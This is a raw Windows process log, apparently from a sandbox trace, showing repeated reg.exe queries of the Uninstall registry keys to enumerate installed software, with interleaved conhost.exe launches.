C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge Update"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft EdgeWebView"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4d8dcf8c-a72a-43e1-9833-c12724db736e}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{61087a79-ac85-455c-934d-1fa22cc64f36}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{63880b41-04fc-4f9b-92c4-4455c255eb8c}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7DAD0258-515C-3DD4-8964-BD714199E0F7}
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BF08E976-B92E-4336-B56F-2171179476C4}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d87ae0f4-64a6-4b94-859a-530b9c313c27}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E30D8B21-D82D-3211-82CC-0F0A5D1495E8}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef5af41f-d68c-48f7-bfb0-5055718601fc}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F6080405-9FA8-4CAA-9982-14E95D1A3DAC}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\36c3a589-07cb-5a5c-93f2-7ca0c417a328
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge Update"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft EdgeWebView"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4d8dcf8c-a72a-43e1-9833-c12724db736e}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{61087a79-ac85-455c-934d-1fa22cc64f36}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{63880b41-04fc-4f9b-92c4-4455c255eb8c}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7DAD0258-515C-3DD4-8964-BD714199E0F7}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BF08E976-B92E-4336-B56F-2171179476C4}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d87ae0f4-64a6-4b94-859a-530b9c313c27}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E30D8B21-D82D-3211-82CC-0F0A5D1495E8}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef5af41f-d68c-48f7-bfb0-5055718601fc}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F6080405-9FA8-4CAA-9982-14E95D1A3DAC}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\36c3a589-07cb-5a5c-93f2-7ca0c417a328
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService
C:\Windows\system32\reg.exe
